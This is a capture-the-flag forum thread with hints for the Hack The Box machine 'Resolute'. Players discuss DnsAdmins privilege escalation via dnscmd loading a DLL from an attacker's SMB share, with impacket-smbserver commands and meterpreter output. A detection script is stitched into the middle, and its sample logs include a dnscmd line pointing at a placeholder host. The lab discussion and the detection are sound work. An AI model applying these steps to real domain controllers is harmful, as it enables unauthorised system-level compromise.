Resolute

Possible Spoiler Removed
Is it supposed to be that way? It should not be, I guess.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

@ev1lm0rty said:

Is it supposed to be that way ? It should not be I guess

Chances are someone else left it in an unstable state when they rooted it. You can test this by resetting the box and trying it again (the password won't have changed).

Alternatively, you have a valid shortcut to root.

Well I’ll try that. Requested a reset.

@TazWake said:

@g1anma5 said:

Is it normal that SMB doesn't respond? It seems to be down.

SMB being down isn’t normal.

After a reset, it seems to work properly.

Finally ROOT! Fun and instructive Windows machine. User was easy. Root was hard for me, wasted a lot of time. Try hard!

My hints:
USER1: just enumerate all you can see…
USER2: …and you CAN’T see.

ROOT: If you think that you are on the correct way, remember to restart the right service.

PM me if you need more hints!

Rooted after 1.5 days of work.

Users are pretty straightforward and people in this forum have already mentioned everything you need.

Initial foothold - enumerate (a classic tool and comes installed with kali). Use the value obtained and try it everywhere you can possibly find.

User - Once you find the right credentials, this should be pretty straightforward.

Root - You should have the credentials to 2 users by now, but you need to gain access to another user. To find it, imagine yourself as a user that tries to HIDE information from other users. That user can do some stuff related to d**, from here google your way to privesc. Just to note, off the shelf payload is fine but architecture is important!

Hope this doesn’t give away too much. If you need a nudge, feel free to PM me.

I'm struggling with the priv escalation part.
Tried dn**Adm DLL injection several times.
I can't figure out the catch for the moment.
!!! Any suggestions please??

@djnux said:

I'm struggling with the priv escalation part.
Tried dn**Adm DLL injection several times.
I can't figure out the catch for the moment.
!!! Any suggestions please??

Architecture of the target machine is important, make sure you are restarting the right service. Sometimes other people are on the machine doing the same things too.

The arch is x64 and then scxxx things

Logged in with the 1st user, now stuck with the 2nd user r***, any tips??

@DeeKay911 said:

Logged in with the 1st user, now stuck with the 2nd user r***, any tips??

You want to start looking around. Looking for things that you might not see if you aren’t looking for everything.

Got the second user r***, and know that he is in the dn gp.
I also made the payload with the poison, shared it via s* to the host, did the "dn****d …" command part and after that the restart, but got no reverse shell. Also tried x86 and x64 architecture and different encoding types with the poison.
Help would be very appreciated!

@grab0id said:

@DeeKay911 said:

Logged in with the 1st user, now stuck with the 2nd user r***, any tips??

You want to start looking around. Looking for things that you might not see if you aren’t looking for everything.

Thanks @grab0id, found the way for r***

@Cooper24 said:

Got the second user r***, and know that he is in the dn gp.
I also made the payload with the poison, shared it via s* to the host, did the "dn****d …" command part and after that the restart, but got no reverse shell. Also tried x86 and x64 architecture and different encoding types with the poison.
Help would be very appreciated!

I am facing the same issue, have you got any solution?

Just got the Admin. First AD box, lots of learning…

Wow! This box was hard for me, I am not great on Windows but I learned a lot through this!

user 1: You need to take your outside enumeration tools to the next generation!
user 2: When enumerating, make sure you're listing ALL files.
root: Pay attention to the output of whoami /all and then do some research. On this step I had no problem with AV even without adding anything fancy to my output.

Protip:

Your exploit will not be loaded from s*b until you restart the service. That caused me an hour of headache :slight_smile:

@steby33 said:

Hello, I obtained user access but I have a problem with root access:
the victim (Resolute) doesn't come to me to pick up the payload on my SMB server, could you help me? (No connection to my SMB server, but it listens well:

impacket-smbserver -debug share /tmp
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

and I execute the dnscmd command on the server with the right options normally…

Any luck? I am stuck here as well. :confused:

@MrSHolmes said:

@steby33 said:

Hello, I obtained user access but I have a problem with root access:
the victim (Resolute) doesn't come to me to pick up the payload on my SMB server, could you help me? (No connection to my SMB server, but it listens well:

impacket-smbserver -debug share /tmp
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

and I execute the dnscmd command on the server with the right options normally…

Any luck? I am stuck here as well. :confused:

I had the same issue, add the parameter “-smb2support” when you create the share, e.g.:
smbserver.py -smb2support -debug SHARE /path/to/share/
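From the defender's side, the dnscmd step discussed in this thread works because the DNS Server service reads the ServerLevelPluginDll value under its Parameters registry key when it starts (hence the "restart the service" hints), so the change is visible in registry-set and process-creation telemetry. The following detection is an added example, not part of the thread or any tool named in it; the Sysmon-style key=value log lines are constructed, and the 203.0.113.7 host is a placeholder.

```python
import re
from typing import Dict, List

# Registry value the DNS Server service loads a plugin DLL from at start-up;
# "dnscmd /config /serverlevelplugindll <path>" writes it.
PLUGIN_VALUE = r"\services\dns\parameters\serverlevelplugindll"

# Constructed Sysmon-style events (ID 13 = registry value set, ID 1 = process
# creation), one per line. Not real telemetry from the box.
SAMPLE_LOG = r"""
EventID=13 Image=C:\Windows\System32\dns.exe TargetObject=HKLM\System\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll Details=\\203.0.113.7\share\plugin.dll
EventID=1 Image=C:\Windows\System32\dnscmd.exe CommandLine=dnscmd.exe /config /serverlevelplugindll \\203.0.113.7\share\plugin.dll
EventID=13 Image=C:\Windows\System32\dns.exe TargetObject=HKLM\System\CurrentControlSet\Services\DNS\Parameters\Forwarders Details=Binary Data
EventID=1 Image=C:\Windows\System32\dnscmd.exe CommandLine=dnscmd.exe /info
EventID=13 Image=C:\Windows\System32\dns.exe TargetObject=HKLM\System\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll Details=C:\Windows\System32\dns\plugins\vendor.dll
"""


def parse_event(line: str) -> Dict[str, str]:
    """Split one key=value line; values may contain spaces but never '='."""
    return dict(re.findall(r"(\w+)=(.*?)(?=\s+\w+=|$)", line))


def is_unc_path(path: str) -> bool:
    """A plugin DLL served from a network share is the classic abuse pattern."""
    return path.startswith("\\\\")


def find_dns_plugin_events(log: str) -> List[str]:
    """Return one finding per event that sets or configures the plugin DLL."""
    findings: List[str] = []
    for raw in log.splitlines():
        line = raw.strip()
        if not line:
            continue
        ev = parse_event(line)
        target = ev.get("TargetObject", "").lower()
        if ev.get("EventID") == "13" and target.endswith(PLUGIN_VALUE):
            dll = ev.get("Details", "")
            # Any write is worth review; a UNC path is the strongest signal.
            sev = "HIGH" if is_unc_path(dll) else "MEDIUM"
            findings.append(f"{sev}: ServerLevelPluginDll set to {dll}")
        elif ev.get("EventID") == "1" and "serverlevelplugindll" in ev.get("CommandLine", "").lower():
            findings.append(f"HIGH: dnscmd plugin-DLL configuration: {ev['CommandLine']}")
    return findings


if __name__ == "__main__":
    for finding in find_dns_plugin_events(SAMPLE_LOG):
        print(finding)
```

Pair a hit on the registry value with a following DNS service restart (service stop/start events) to confirm the plugin was actually loaded rather than only configured.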

Loved this box, Resolute!
Definitely loved it, also because it has been my first box on HTB!
It took a lot of time! :smiley:

I learned so much on Win Env, I was not used to it anymore, rooted first the “unintended way”, then the intended one using a writeup :wink:

It’s so sad knowing it will be retired during this coming weekend…

Bye, Resolute! So long, and thanks for all the fish… (quote)

Can anyone PM me why I get this error, or how to fix it?

I get this when trying to connect

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:39: warning: constant OpenSSL::Cipher::Cipher is deprecated

/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:128: warning: constant OpenSSL::Cipher::Cipher is deprecated

Error: An error of type HTTPClient::ReceiveTimeoutError happened, message is execution expired

Error: Exiting with code 1